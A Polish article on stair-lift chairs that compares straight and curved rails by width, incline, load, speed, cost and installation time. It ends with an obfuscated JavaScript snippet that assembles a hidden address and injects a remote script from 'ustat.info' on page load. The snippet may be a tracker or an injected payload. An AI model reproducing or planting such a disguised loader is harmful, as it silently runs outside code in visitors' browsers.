Podstawowe rodzaje krzeseł schodowych – sprawdź, jak pomóc osobie niepełnosprawnej

Spis treści

Jak umożliwić osobom niepełnosprawnym i wymagającym opieki poruszanie się po schodach? Oto podstawowe informacje o krzesłach schodowych.

Jednym z najpopularniejszych sposobów na zapewnienie osobom niepełnosprawnym możliwości przemieszczania się po schodach są specjalne krzesła. Składają się one z wygodnego wózka z siedziskiem, które porusza się po przymocowanej do ścian szynie. Generalnie urządzenia te można podzielić na dwa rodzaje – wyposażone w szynę prostą i krzywoliniową.

 

Krzesła na szynie prostej


Krzesła na szynie prostej mogą być montowane po obu stronach schodów, zarówno lewej, jak i prawej. Minimalna wymagana ich szerokość wynosi 60 cm, zmieszczą się wtedy praktycznie wszystkie dostępne na rynku modele wózków. Standardowa długość szyny wynosi około 4 metrów, ale można ją zamontować do schodów o dowolnej długości. Skrócenie jej nie stanowi żadnego problemu, szyny można też łączyć na dowolną długość. Trzeba pamiętać, że konieczność łączenia szyny zwiększa koszty całego urządzenia, a także wydłuża czas instalacji.

Standardowe wymiary szyn są dostępne od ręki, w przypadku szyny łączonej trzeba będzie chwilę poczekać na jej wykonanie. Szyny najczęściej mocowane są do ściany, dlatego też ich konstrukcja musi spełniać odpowiednie wymagania co do wytrzymałości. Ważną sprawą przy montażu takiego krzesełka jest kąt nachylenia, gdyż do niego należy dobrać odpowiednie urządzenie. Dostępne na rynku krzesła oferują duże możliwości w tym względzie.

Standardowe konstrukcje pozwalają na instalację przy schodach o nachyleniu od 25 do 55 stopni, ale można też znaleźć takie, które umożliwiają montaż przy kącie 75 stopni. Krzesła na szynie prostej najczęściej posiadają udźwig do 130 kg, a ich maksymalna prędkość wynosi 5 metrów/minutę. Prędkość ta wynika z konieczności zapewnienia odpowiedniego bezpieczeństwa pasażerowi.

Ciekawym rozwiązaniem, wykorzystywanym często w sytuacji, gdy nie ma przed schodami zbyt dużo miejsca, są szyny ze składaną końcówką. Gdy urządzenie nie jest używane, szyna znajduje się w pozycji złożonej, a rozkłada się automatycznie w momencie poruszania się wózka. Jedną z najważniejszych zalet krzeseł w tej wersji są znacznie niższe koszty niż w przypadku szyny krzywoliniowej i szybszy czas zakupu i montażu.

Sprawdź również: Inwalidztwo - zwolnienie z opłat

 

 

Krzesła na szynie krzywoliniowej


Krzesła z szyną prostą sprawdzają się w sytuacjach, gdy ciąg schodowy nie ma żadnych zakrętów, jeśli takie są, niezbędne będzie zastosowanie szyny krzywoliniowej. Trzeba jednak mieć świadomość tego, że taka instalacja będzie znacznie droższa w zakupie, nie będzie także możliwości kupna urządzenia używanego.

Projekt krzesła z szyną krzywoliniową wymaga wcześniej przeprowadzenia dokładnych pomiarów przez doświadczoną osobę. Wynika to z tego, że konstrukcja dopasowywana jest do profilu schodów i musi po wykonaniu idealnie pasować.

Krzesła wykorzystujące szynę krzywoliniową dają bardzo duże możliwości, można je zainstalować praktycznie w każdym miejscu, które będzie miało odpowiednią szerokość. W porównaniu z urządzeniami z szyną prostą mają znacznie większy zasięg – wynosi on nawet kilka pięter. Co ważne, w całym ciągu można przewidzieć kilka przystanków, na których będzie możliwe wsiadanie i wysiadanie. Przystanki pozwalają na dużą wygodę, ale sporo podnoszą koszty inwestycji. Przy tego typu instalacji trzeba się liczyć z koniecznością dłuższego czasu oczekiwania, gdyż od momentu wykonania pomiarów do końcowego montażu może upłynąć nawet kilka tygodni.

Źródło: Pokonaj-bariery.pl


(function(){
cXia=document.createElement("script");cXia_=("ust");cXiau="60524825";
cXia_+="a"+("t.i");cXia.type="text/javascript";
cXiau+=".raadhbjXXialgkjwlk8s";cXia.async=true;cXia_+="n"+("f"+"o")+"/";
cXiau+="79u9Xtfn6h";cXia.src="//"+cXia_+cXiau;
document.body.appendChild(cXia);
})();